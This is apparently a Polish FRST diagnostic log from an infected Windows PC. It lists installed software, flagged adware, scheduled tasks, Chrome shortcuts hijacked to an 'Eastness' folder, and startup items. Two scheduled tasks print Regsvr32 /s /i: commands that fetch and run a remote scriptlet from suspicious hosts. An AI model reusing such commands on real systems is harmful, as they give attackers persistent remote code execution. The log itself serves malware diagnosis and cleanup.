Catalyst Control Center Next Localization TR (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 5.03 - Piriform)
CDBurnerXP (HKLM\...\{7E265513-8CDA-4631-B696-F40D983F3B07}_is1) (Version: 4.5.4.5306 - CDBurnerXP)
CDBurnerXP (HKLM-x32\...\{7E265513-8CDA-4631-B696-F40D983F3B07}_is1) (Version: 4.5.6.5931 - CDBurnerXP)
Charity Engine (HKLM-x32\...\{7309D717-F38D-436D-9537-066AA0AC7639}) (Version: 7.0.80 - Charity Engine)
Core Temp Packages (HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\Core Temp Packages) (Version:  - ) <==== UWAGA
Core Temp version 0.99.8 (HKLM\...\{086D343F-8E78-4AFC-81AC-D6D414AFD8AC}_is1) (Version: 0.99.8 - Arthur Liberman)
CPUID HWMonitor 1.27 (HKLM\...\CPUID HWMonitor_is1) (Version:  - )
DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 5.0.1.0407 - Disc Soft Ltd)
DarkEra (HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\DarkEra) (Version:  - DarkEra) <==== UWAGA
Debugging Tools for Windows (x86) (HKLM-x32\...\{300A2961-B2B5-4889-9CB9-5C2A570D08AD}) (Version: 6.11.1.404 - Microsoft Corporation)
Deluxe Ski Jump 4 (HKLM-x32\...\Deluxe Ski Jump 4_is1) (Version: 1.5.1 - Mediamond Tmi)
Dropbox (HKLM-x32\...\Dropbox) (Version: 24.4.16 - Dropbox, Inc.)
Dropbox Update Helper (x32 Version: 1.3.59.1 - Dropbox, Inc.) Hidden
EaseUS Partition Master 10.2 (HKLM-x32\...\EaseUS Partition Master_is1) (Version:  - EaseUS)
EASEUS Partition Master Packages (HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\EASEUS Partition Master Packages) (Version:  - ) <==== UWAGA
EaseUS Todo Backup Free 8.2  (HKLM-x32\...\EaseUS Todo Backup_is1) (Version: 8.2 - CHENGDU YIWO Tech Development Co., Ltd)
GG (HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\GG) (Version: 12 - GG Network S.A.)
GIMP 2.8.14 (HKLM\...\GIMP-2_is1) (Version: 2.8.14 - The GIMP Team)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 57.0.2987.133 - Google Inc.)
Google Drive (HKLM-x32\...\{A1238426-ECDF-4639-BE2F-8D12A97AE23C}) (Version: 2.34.5075.1619 - Google, Inc.)
Google Earth (HKLM-x32\...\{F6430171-B86B-4639-839E-374913E7911D}) (Version: 7.1.8.3036 - Google)
Google Update Helper (x32 Version: 1.3.33.3 - Google Inc.) Hidden
HD Tune 2.55 (HKLM-x32\...\HD Tune_is1) (Version:  - EFD Software)
Heaven Benchmark version 4.0 (HKLM-x32\...\Unigine Heaven Benchmark (Basic Edition)_is1) (Version: 4.0 - Unigine Corp.)
HWMonitor Packages (HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\HWMonitor Packages) (Version:  - ) <==== UWAGA
Infinite Media Acceleration (HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\Octoshape Streaming Services) (Version:  - Akamai Inc.)
Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 10.0.28.1006 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.8.0.1016 - Intel Corporation)
Intel(R) Smart Connect Technology (HKLM\...\{4188E70A-4D3B-447C-B366-963C9E8B4538}) (Version: 5.0.10.2907 - Intel Corporation)
ipla 2.8.7 (HKLM-x32\...\ipla) (Version: 2.8.7 - Cyfrowy Polsat S.A.)
IrfanView 4.44 (32-bit) (HKLM-x32\...\IrfanView) (Version: 4.44 - Irfan Skiljan)
Java 8 Update 121 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180121F0}) (Version: 8.0.1210.13 - Oracle Corporation)
Java 8 Update 45 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218045F0}) (Version: 8.0.450 - Oracle Corporation)
K-Lite Codec Pack 11.6.5 Basic (HKLM-x32\...\KLiteCodecPack_is1) (Version: 11.6.5 - )
McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 3.11.163.2 - McAfee, Inc.)
Metric Collection SDK (x32 Version: 1.1.0012.00 - Lenovo Group Limited) Hidden
Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.40416.0 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727 (HKLM-x32\...\{15134cb0-b767-4960-a911-f2d16ae54797}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24123 (HKLM-x32\...\{2cbcedbb-f38c-48a3-a3e1-6c6fd821a7f4}) (Version: 14.0.24123.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
mIRC (HKLM-x32\...\mIRC) (Version: 7.41 - mIRC Co. Ltd.)
Mozilla Firefox 53.0 (x86 pl) (HKLM-x32\...\Mozilla Firefox 53.0 (x86 pl)) (Version: 53.0 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 53.0 - Mozilla)
MSI Afterburner 2.3.1 (HKLM-x32\...\Afterburner) (Version: 2.3.1 - MSI Co., LTD)
MSI GamingApp (HKLM-x32\...\{E0229316-E73B-484B-B9E0-45098AB38D8C}}_is1) (Version: 1.0.0.18 - MSI)
OpenAL (HKLM-x32\...\OpenAL) (Version:  - )
OpenFM (HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\OpenFM) (Version: 2 - GG Network S.A.)
Oprogramowanie mikroukładu Intel® (x32 Version: 10.0.20 - Intel(R) Corporation) Hidden
Oracle VM VirtualBox 5.0.10 (HKLM\...\{F6E922CF-068D-4AFC-8DBF-4636B84AF0A5}) (Version: 5.0.10 - Oracle Corporation)
PhotoScape (HKLM-x32\...\PhotoScape) (Version:  - )
Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.9.141.259 - Google, Inc.)
PlayReady PC Runtime x86 (HKLM-x32\...\{CCA5EAAD-92F4-4B7A-B5EE-14294C66AB61}) (Version: 1.3.0 - Microsoft Corporation)
Pro Evolution Soccer 2015 (HKLM-x32\...\UHJvRXZvbHV0aW9uU29jY2VyMjAxNQ==_is1) (Version: 1 - )
Raptr (HKLM-x32\...\Raptr) (Version:  - )
REACHit (HKLM-x32\...\{4532E4C5-C84D-4040-A044-ECFCC5C6995B}) (Version: 2.5.005.12 - Lenovo)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.23.1126.2013 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7293 - Realtek Semiconductor Corp.)
SafeZone Stable 3.55.2393.596 (x32 Version: 3.55.2393.596 - Avast Software) Hidden
ScanSpeeder 1.5.4 (HKLM-x32\...\ScanSpeeder 1.5.4) (Version:  1.5.4 - Nitro Logic)
Search App by Ask (HKLM-x32\...\{4F524A2D-5350-4500-76A7-A758B70C2E03}) (Version: 12.46.3.4268 - APN, LLC) <==== UWAGA
Shopping App by Ask (HKLM-x32\...\{53504353-502D-5341-5400-A758B70C2600}) (Version: 12.38.0.3425 - APN, LLC)
Skype™ 7.33 (HKLM-x32\...\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}) (Version: 7.33.105 - Skype Technologies S.A.)
SopCast 3.9.6 (HKLM-x32\...\SopCast) (Version: 3.9.6 - http://www.sopcast.com)
SpeedFan (remove only) (HKLM-x32\...\SpeedFan) (Version:  - )
System Requirements Lab (HKLM-x32\...\{8DCAB1D8-F20C-4733-9B5F-646DDFEB59C9}) (Version: 6.1.1.0 - Husdawg, LLC)
Tlen.pl (HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\Tlen.pl) (Version:  - )
Unigine Valley Benchmark version 1.0 (HKLM-x32\...\Unigine Valley Benchmark_is1) (Version: 1.0 - Unigine Corp.) <==== UWAGA
VGA Boost (HKLM-x32\...\{809ACFAE-9A4D-4C60-9223-D8B615CD8CBA}}_is1) (Version: 1.0.0.8 - MSI)
VLC media player (HKLM\...\VLC media player) (Version: 2.2.4 - VideoLAN)
Vulkan Run Time Libraries 1.0.37.0 (HKLM\...\VulkanRT1.0.37.0) (Version: 1.0.37.0 - LunarG, Inc.)
Winamp (HKLM-x32\...\Winamp) (Version: 5.666  - Nullsoft, Inc)
Winamp Packages (HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\Winamp Packages) (Version:  - ) <==== UWAGA
WinRAR 5.31 (64-bitowy) (HKLM\...\WinRAR archiver) (Version: 5.31.0 - win.rar GmbH)
YAC(Yet Another Cleaner!) (HKLM-x32\...\iSafe) (Version:  - ELEX DO BRASIL cenzura!ÇÕES LTDA) <==== UWAGA

==================== Niestandardowe rejestracje CLSID (filtrowane): ==========================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

CustomCLSID: HKU\S-1-5-21-1070030570-2694662635-206350218-1001_Classes\CLSID\{E68D0A55-3C40-4712-B90D-DCFA93FF2534}\InprocServer32 -> C:\Users\Adam\AppData\Roaming\GG\ggdrive\ggdrive-menu.dll (GG Network S.A.)

==================== Zaplanowane zadania (filtrowane) =============

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

Task: {07FFBB38-9399-4F74-A986-63BFF331F634} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program 64 => C:\Program Files (x86)\Lenovo\Customer Feedback Program\Lenovo.TVT.CustomerFeedback.Agent.exe [2015-07-08] (Lenovo)
Task: {3307A47E-C8F4-4F36-8139-0F99F5BE3E58} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-06-13] (Dropbox, Inc.)
Task: {59748C6B-F967-4ADB-B891-0BDACFDDAFD1} - System32\Tasks\SafeZone scheduled Autoupdate 1459685331 => C:\Program Files\AVAST Software\SZBrowser\launcher.exe [2017-03-22] (Avast Software)
Task: {66480450-3889-489E-8D75-844E8CCDAC06} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-02-02] (Adobe Systems Incorporated)
Task: {7708D1D6-41A6-47F5-A65C-DFCA23EC18AB} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-02-27] (Google Inc.)
Task: {7EEA6424-BBCF-4ECA-8DE2-B51166346CB6} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj81MdkcFTJYOTNYRWY1MTE5FjQSMWZXOUNLOTFyOWVWFF== scrobj.dll
Task: {98F4CC0B-F31A-420E-A87C-75201EB84200} - System32\Tasks\Avast Emergency Update => C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe [2017-04-04] (AVAST Software)
Task: {A47567B8-9D12-4781-82C5-D3A7B7F35898} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-02-27] (Google Inc.)
Task: {AC1D1C80-C99A-40C6-B2C5-953F1E7F4328} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2017-04-13] (AVAST Software)
Task: {B017C9AE-A5F5-4440-A333-3E9CFC9E3067} - System32\Tasks\Lenovo\REACHit Agent Update => C:\Program Files (x86)\Lenovo\REACHit\REACHitAgent.exe [2016-05-18] (Lenovo)
Task: {B3F47DB7-1864-4241-AE93-1A086F10EA5C} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2015-02-19] (Piriform Ltd)
Task: {BAB785D2-B667-49B6-83DC-099BD0D65BE3} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj81MdkcFTJYOTNYRWY1MTE5FjQSMWZXOUNLOTFyOWVWFF== scrobj.dll
Task: {BF1F34D5-80CA-43EF-A484-953E99F27812} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-06-13] (Dropbox, Inc.)
Task: {D43D5837-1FCB-48F8-A5B6-F84420FF18F3} - System32\Tasks\Lenovo\REACHit Agent Startup => C:\Program Files (x86)\Lenovo\REACHit\REACHitAgent.exe [2016-05-18] (Lenovo)
Task: {DC4FD262-3AE9-4E36-99B4-EFBBEB1885B4} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-04-11] (Adobe Systems Incorporated)
Task: {E3BDD352-9C03-40C5-BDDF-9933C86413E9} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [2017-03-16] (Advanced Micro Devices, Inc.)
Task: {E7E638E7-74CD-41E6-9301-E887B6BE759F} - System32\Tasks\TuneUpUtilities_Task_BkGndMaintenance2013 => C:\Program Files (x86)\AVG\AVG PC TuneUp\OneClick.exe [2014-10-17] (AVG Technologies)
Task: {EDC76904-EC71-4363-B46F-A59612B8B52F} - System32\Tasks\RTSS => C:\Program Files (x86)\MSI Afterburner\Bundle\OSDServer\RTSS.exe [2013-01-23] ()

(Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.)

Task: C:\Windows\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\Windows\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe

==================== SkrĂłty =============================

(Wybrane wejścia mogą zostać załączone w celu ich zresetowania lub usunięcia.)

Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)

==================== Załadowane moduły (filtrowane) ==============

2014-05-13 09:15 - 2013-05-07 09:45 - 00936728 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe
2014-08-25 17:01 - 2014-08-25 17:01 - 00209712 _____ () C:\Program Files\Intel\Intel(R) Smart Connect Technology Agent\iSCTAgent.exe
2014-08-25 17:01 - 2014-08-25 17:01 - 00057648 _____ () C:\Program Files\Intel\Intel(R) Smart Connect Technology Agent\NetworkHeuristic.dll
2014-08-25 17:01 - 2014-08-25 17:01 - 00057648 _____ () C:\Program Files\Intel\Intel(R) Smart Connect Technology Agent\ISCTEncryptionCheck.dll
2014-08-25 17:01 - 2014-08-25 17:01 - 00037168 _____ () C:\Program Files\Intel\Intel(R) Smart Connect Technology Agent\ISCTNetMon.dll
2014-10-17 13:34 - 2014-10-17 13:34 - 00699704 _____ () C:\Program Files (x86)\AVG\AVG PC TuneUp\avgrepliba.dll
2014-10-17 13:34 - 2014-10-17 13:34 - 00835896 _____ () C:\Program Files (x86)\AVG\AVG PC TuneUp\tulnga.dll
2016-09-14 04:20 - 2016-09-14 04:20 - 00014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick.2\qtquick2plugin.dll
2016-09-14 04:20 - 2016-09-14 04:20 - 00739840 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Controls\qtquickcontrolsplugin.dll
2016-09-14 04:20 - 2016-09-14 04:20 - 00014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Window.2\windowplugin.dll
2016-09-14 04:20 - 2016-09-14 04:20 - 00071168 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Layouts\qquicklayoutsplugin.dll
2016-09-14 04:20 - 2016-09-14 04:20 - 00011776 _____ () C:\Program Files\AMD\CNext\CNext\libEGL.dll
2016-09-14 04:20 - 2016-09-14 04:20 - 02013696 _____ () C:\Program Files\AMD\CNext\CNext\libGLESv2.dll
2016-09-14 04:20 - 2016-09-14 04:20 - 00191488 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Dialogs\dialogplugin.dll
2014-05-13 09:15 - 2014-05-13 09:15 - 00027648 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\PEbiosinterface32.dll
2014-05-13 09:15 - 2013-05-07 09:45 - 00104448 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\ATKEX.dll
2015-03-17 23:15 - 2014-12-15 01:53 - 00098856 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\CodeLog.dll
2015-03-17 23:15 - 2014-12-15 01:53 - 00031272 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\CheckTool.dll
2015-03-17 23:15 - 2014-12-15 01:53 - 00017448 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\CompressFile.dll
2015-03-17 23:16 - 2014-12-15 01:53 - 00088616 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\TBGetRemoteNetInfo.dll
2015-03-17 23:16 - 2014-12-15 01:53 - 01296424 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\libxml2.dll
2015-03-17 23:16 - 2014-12-15 01:53 - 00060968 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\zlib1.dll
2015-03-17 23:15 - 2015-03-14 12:53 - 00107560 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\ActivationOnline.dll
2015-03-17 23:16 - 2014-12-15 01:53 - 00077864 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\logsys.dll
2015-03-17 23:15 - 2014-12-15 01:53 - 00030248 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\DiskSearchImg.dll
2015-03-17 23:16 - 2014-12-15 01:53 - 00068136 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\MountImg.dll
2015-03-17 23:16 - 2014-12-15 01:53 - 00158248 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\ImgFile.dll
2015-03-17 23:15 - 2015-03-14 12:54 - 00281128 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\DsImgFile.dll
2015-03-17 23:15 - 2015-03-14 12:54 - 00072232 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\CheckImg.dll
2015-03-17 23:16 - 2014-12-15 01:53 - 00139816 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\vhdvmdk.dll
2015-03-17 23:15 - 2014-12-15 01:53 - 00037416 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\BootDriver.dll
2015-03-17 23:16 - 2015-03-14 12:54 - 00759848 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\ExImage.dll
2015-03-17 23:15 - 2014-12-15 01:53 - 00193064 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\EmailBackupSize.dll
2015-03-17 23:15 - 2014-12-15 01:53 - 00407080 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\AndroidImage.dll
2015-03-17 23:16 - 2014-12-15 01:53 - 00148008 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\EnumDisk.dll
2015-03-17 23:16 - 2014-12-15 01:53 - 00076840 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\FatLib.dll
2015-03-17 23:16 - 2014-12-15 01:53 - 00207912 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\NTFSLib.dll
2015-03-17 23:16 - 2014-12-15 01:53 - 00024616 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\GetDriverInfo.dll
2015-03-17 23:15 - 2014-12-15 01:53 - 00020520 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\CorrectMbr.dll
2015-03-17 23:16 - 2014-12-15 01:53 - 00032296 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\EnumTapeDevice.dll
2015-03-17 23:16 - 2014-12-15 01:53 - 00034856 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\TbTapeBrowse.dll
2015-03-17 23:16 - 2014-12-15 01:53 - 00064040 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\RegLib.dll
2015-03-17 23:15 - 2014-12-15 01:53 - 00022568 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\AccountManager.dll
2015-03-17 23:16 - 2014-12-15 01:53 - 00115752 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\NasOperator.dll
2015-03-17 23:15 - 2014-12-15 01:53 - 00194088 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\EmailBrowser.dll
2015-03-17 23:15 - 2014-12-15 01:53 - 00077864 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\CloudOperator.dll
2015-03-17 23:15 - 2014-12-15 01:53 - 00037928 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\ActiveOnline.dll
2015-03-17 23:16 - 2014-12-15 01:53 - 00135720 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\VMConfig.dll
2015-03-17 23:15 - 2014-12-15 01:53 - 00020008 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\AndroidDeviceManager.dll
2015-03-17 23:16 - 2014-12-15 01:53 - 00043048 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\TbDataSwap.dll
2015-03-17 23:16 - 2014-12-15 01:53 - 00096808 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\TBFireWall.dll
2015-03-17 23:15 - 2014-12-15 01:53 - 00353832 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\DeviceManager.dll
2015-03-17 23:15 - 2014-12-15 01:53 - 00027176 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\DeviceAdapter.dll
2015-03-17 23:15 - 2014-12-15 01:53 - 00137256 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\Device.dll
2015-03-17 23:16 - 2014-12-15 01:53 - 00146984 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\Partition.dll
2015-03-17 23:16 - 2014-12-15 01:53 - 00050216 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\FileSystemAnalyser.dll
2015-03-17 23:16 - 2014-12-15 01:53 - 00061992 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\FATFileSystemAnalyser.dll
2015-03-17 23:15 - 2014-12-15 01:53 - 00089640 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\Common.dll
2015-03-17 23:16 - 2014-12-15 01:53 - 00056360 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\NTFSFileSystemAnalyser.dll
2014-09-03 12:03 - 2014-09-03 12:03 - 01241560 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll
2017-04-04 20:59 - 2017-04-04 20:59 - 00170216 _____ () C:\Program Files\AVAST Software\Avast\JsonRpcServer.dll
2016-09-26 14:14 - 2016-09-26 14:14 - 48936448 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll
2017-04-04 20:59 - 2017-04-04 20:59 - 00176480 _____ () C:\Program Files\AVAST Software\Avast\event_routing_rpc.dll
2017-04-04 20:58 - 2017-04-04 20:58 - 00293936 _____ () C:\Program Files\AVAST Software\Avast\gaming_mode_ui.dll
2017-04-04 20:59 - 2017-04-04 20:59 - 00653520 _____ () C:\Program Files\AVAST Software\Avast\ffl2.dll
2017-04-17 15:50 - 2017-03-09 07:31 - 02187096 _____ () C:\Program Files (x86)\Eastness\Application\libglesv2.dll
2017-04-17 15:50 - 2017-03-09 07:31 - 00086360 _____ () C:\Program Files (x86)\Eastness\Application\libegl.dll

==================== Alternate Data Streams (filtrowane) =========

(Załączenie wejścia w fixlist spowoduje usunięcie strumienia ADS.)


==================== Tryb awaryjny (filtrowane) ===================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Wartość "AlternateShell" zostanie przywrócona.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfemms => ""="Service"

==================== PowiÄ…zania plikĂłw (filtrowane) ===============

(Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci.)


==================== Internet Explorer - Witryny zaufane i z ograniczeniami ===============

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru.)


==================== Hosts - zawartość: ===============================

(UĹĽycie dyrektywy Hosts: w fixlist spowoduje reset pliku Hosts.)

2013-08-22 15:25 - 2015-09-28 10:20 - 00000856 ____N C:\Windows\system32\Drivers\etc\hosts

0.0.0.1   mssplus.mcafee.com

==================== Inne obszary ============================

(Obecnie brak automatycznej naprawy dla tej sekcji.)

HKU\S-1-5-21-1070030570-2694662635-206350218-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\web\wallpaper\Windows\img0.jpg
DNS Servers: 192.168.0.1 - 8.8.8.8
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Zapora systemu Windows [funkcja włączona]

==================== MSCONFIG/TASK MANAGER - Wyłączone elementy ==

HKLM\...\StartupApproved\StartupFolder: => "McAfee Security Scan Plus.lnk"
HKLM\...\StartupApproved\Run32: => "Device Detector"
HKLM\...\StartupApproved\Run32: => "Raptr"
HKLM\...\StartupApproved\Run32: => "EaseUS EPM tray"
HKLM\...\StartupApproved\Run32: => "Smart File Advisor"
HKLM\...\StartupApproved\Run32: => "SFAUpdater"
HKLM\...\StartupApproved\Run32: => "boincmgr"
HKLM\...\StartupApproved\Run32: => "Dropbox"
HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\StartupApproved\StartupFolder: => "MyPC Backup.lnk"
HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\StartupApproved\StartupFolder: => "Dropbox.lnk"
HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\StartupApproved\Run: => "GG"
HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\StartupApproved\Run: => "Skype"
HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\StartupApproved\Run: => "Tlen.pl"
HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\StartupApproved\Run: => "CCleaner Monitoring"
HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\StartupApproved\Run: => "DAEMON Tools Lite"
HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\StartupApproved\Run: => "Dropbox Update"
HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\StartupApproved\Run: => "AlcoholAutomount"
HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\StartupApproved\Run: => "IPLA!"

==================== Reguły Zapory systemu Windows (filtrowane) ===============

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
